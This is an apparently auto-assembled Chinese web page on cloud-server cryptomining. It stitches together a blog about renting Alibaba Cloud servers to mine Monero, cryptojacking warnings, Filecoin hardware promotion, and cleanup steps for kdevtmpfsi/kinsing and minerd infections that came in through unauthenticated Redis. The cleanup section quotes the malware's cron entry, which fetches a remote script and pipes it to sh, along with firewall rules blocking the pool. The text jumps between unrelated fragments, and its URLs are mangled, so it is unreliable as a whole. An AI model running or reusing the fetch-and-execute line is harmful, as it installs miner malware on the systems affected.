新买的云服务器提示挖矿
利用云电脑的计算资源执行挖矿的持续性程序,
已停止是服务绝大数都是正常的。这些已停止表示你已经禁用或停止了相关的服务,但停止不是卸载,所以它们仍然存在是正常的,每台电脑里都有许多已停止的服务,不用担心。你真正要担心的是360那个提示,可在任务管理器中查着活动进程,若某进程CPU或内存占用高,而你又不明确该进程是干嘛的,可以先结束进程再看看360还会不会提醒!
监控网络性能,查看未经授权连接的日志,使用浏览器扩展组件,阻止恶意挖矿软件,启用Edge浏览器的Super-Duper安全模式。
随着加密货币市值的一路飙升,恶意挖矿软件正在全球肆虐,比员工上班摸鱼更可怕的是,来自外部或内部的挖矿软件正在悄悄消耗着企业的IT资源,侵蚀企业利润。当不法分子通过 Web 服务器和浏览器劫持系统时,就会发生加密劫持(挖矿)。
恶意 JavaScript 通常被注入或植入 Web 服务器,当用户访问网页时,浏览器就会被感染,将他们的计算机变成矿工。
三天以前看到壮乡金荣仔的文章,从中了解到可以利用阿里云服务器进行挖矿,收益可观,于是立即和作者进行了联系,咨询拜师的事情。
通过和孙师傅交流发现,因为写作让我们有了很多共同交流的基础,并且我居然已经关注了孙师傅有好几个月的时间了,这让我们很快建立了信任。
孙师傅在文章中提到正式收徒弟还要等一段时间,我觉得这段时间也不能浪费,还应该为将来拜师以后做一点准备工作。于是我立即开始对云服务挖矿这件事情进行了认真的思考并实践。
云服务挖矿的可行性,大概有这么几个方面。
一,云服务器挖矿的成本收益分析。
成本构成:挖矿的成本主要有三项,矿机的支出,电费,场地及相关管理费用;
收益构成:挖矿的收益主要来自两个方面,一是按照当前数字货币的法币价格可以不管成本而获得的收益,二是数字货币在未来增值获得的收益。
分析:云服务器的运算能力远远低于实体矿机,但是不用支付电费,这是最大的成本节省,另外,由于不需要场地,自己远程管理,场地和管理费用也趋近于零。
因此在算力有限的情况下,云服务器挖矿最大限度地消除了电费和场地的费用,这是这项技术的优势所在。而盈利的平衡点,将极大的取决于服务器费用的支出和当前币价的相对关系。
二,云服务器和挖矿币种的分析。
云服务器的种类有很多,主要分两种,CPU型和GPU型。
目前市场上的各种虚拟币算法也分两类,GPU友好型和CPU有好型。比特币以太坊,莱特币等绝大多数币种都属于GPU友好型,CPU友好型比较少,我了解到的只有大零币zec,小零币xzc,门罗币xmr。
所以这样一来,在服务器和币种的选择问题上,方向很清晰:CPU和GPU任何一个方向,选择算力性价比最高的云服务器和挖矿收益最高的币种。
三,实践。
李笑来的文章中提到过,任何挖矿的行为都不如直接到市场上去买来得容易。我也因此在之前的虚拟货币的学习中,很少关注挖矿的知识。同时对于服务器方面的知识也了解很少,所以一开始我只能用网络上能够搜索得到的办法进行实践, 以快速入门,开始积累。
网上能够直接搜索到的就是利用CPU服务器挖掘门罗币。文章链接如下。
于是我花了3915元购买了三个月的阿里云轻量型服务器,配置如下。阿里云目前在搞活动,首单可以打七折。
开始进行实践。
经过了两天的折腾,终于在运行服务器上挖矿成功,但是算力只有140h/s,在这个算力下,要亏本一半。
具体折腾的过程中,遇到坑无数,也麻烦了我搞计算机的朋友很多,这个过程留待下一篇再写吧。
四,关于风险的思考。
目前来看,用云服务器挖矿服务器的价格是预付的,并且是固定的,所以挖矿是否有收益,取决于目前的虚拟货币的价格。从孙师傅的截图来看,目前收益还是很可观的。
近期的风险来自于币价的下跌,远期的风险来看,就是阿里云服务器会禁止挖矿行为。阿里云对于挖矿的行为,在网上有过很多的声明。在搜索服务器挖矿相关知识的时候,也发现有国外的服务器禁止挖矿。
长期来看,如果目前云服务器挖矿不赔本那么未来大概率是会有很大的收益的。
就在写这一篇的过程中,孙师傅的收徒标也发出来了,很快就要收徒弟啦。我也正好把这一篇当做我第一这周的作业。
挖矿病毒处理步骤如下:
1、查看服务器进程运行状态查看服务器系统整体运行情况,发现名为kdevtmpfsi的挖矿进程大量占用系统CPU使用率。
2、查看端口及外联情况查看端口开放状态及外联情况,发现主机存在陌生外联行为。对该外部地址进行查询发现属于国外地址,进一步确定该进程为恶意挖矿进程:定位挖矿进程及其守护进程PID挖矿病毒kdevtmpfsi在运行过程中不仅会产生进程kdevtmpfsi。
还存在守护进程kinsing,该进程会不断重启挖矿shell脚本,所以必须将主进程和守护进程一起消灭。因此需要对进程kinsing进行定位。查看主进程kdevtmpfsi的PID:
5、Redis服务排查通过端口开放情况发现6379端口及22端口正常开放。查看redis配置文件,发现未设置登陆密码,任意用户均可成功连接。
6、查看redis日志通过查看redis配置文件/etc/redisconf发现日志功能未开启。
7、查找敏感文件发现authorized_keys文件。
8、查看ssh日志文件查看ssh日志文件,发现大量登陆痕迹以及公钥上传痕迹。
有以下几种方法:
在局域网中选部分电脑部署软件防火墙,然后通过防火墙拦截记录就能发现病毒源主机。这种适合小规模局域网。
使用专杀工具进行挨个主机杀毒,为防止病毒流窜,只开一台电脑进行杀毒,查杀完毕后立马关机,再开另一台进行杀毒。工作量比较大。
部署企业版杀毒软件,如火绒等。如需要,我可以帮你申请三个月免费试用。当然也可以自己去官网申请。
暂时就想到这么多,希望对你有用。
天下数据觉得我们可以从技术水平,品牌塑造等层面去考虑。
技术层面市场上绝大多数的矿工多多少少都存在一定的问题
如在一店家买来ipfs矿机,容积很小插不进去显卡,那样就务必要拆换主机箱也就是说购买外接的独立显卡的拓展,
那麼一些网络服务器的cpu还达不上规定,没办法去密封32G的扇区,因此就务必要更换cpu,
之后发现好一些的cpu必须拆换更高级的主板,还需要拆换主板,
因此类似这样的问题很多,原因就取决于绝大多项目投资的盆友,对Fliecoin的硬件配置并不是很了解。
再其次就是品牌背书了,在这次刚结束的太空竞赛第一阶段中,我们可以去查矿工们的排名,
1 关闭访问挖矿服务器的访问
iptables -A INPUT -s xmrcrypto-poolfr -j DROP and iptables -A OUTPUT -d xmrcrypto-poolfr -j DROP
2 chmod -x minerd ,取消掉执行权限, 在没有找到根源前,千万不要删除 minerd,因为删除了,过一回会自动有生成一个。
3 pkill minerd ,杀掉进程
4 service stop crond 或者 crontab -r 删除所有的执行计划
5 执行top,查看了一会,没有再发现minerd 进程了。
6检查/var/spool/cron/目录下发现有个root用户的定时器文件。
下载脚本的语句:
/5 curl -fsSL http://wwwhaveabitchincom/pmsh0105010 | sh
病毒文件内容如下,感兴趣的可以研究下:
 View Code
解决minerd并不是最终的目的,主要是要查找问题根源,我的服务器问题出在了redis服务了,黑客利用了redis的一个漏洞获得了服务器的访问权限,http://blogjobbolecom/94518/然后就注入了病毒,下面是解决办法和清除工作:
1 修复 redis 的后门,
配置bind选项, 限定可以连接Redis服务器的IP, 并修改redis的默认端口6379
配置AUTH, 设置密码, 密码会以明文方式保存在redis配置文件中
配置rename-command CONFIG “RENAME_CONFIG”, 这样即使存在未授权访问, 也能够给攻击者使用config指令加大难度
好消息是Redis作者表示将会开发”real user”,区分普通用户和admin权限,普通用户将会被禁止运行某些命令,如conf
2 打开 ~/ssh/authorized_keys, 删除你不认识的账号
3 查看你的用户列表,是不是有你不认识的用户添加进来。 如果有就删除掉
0条评论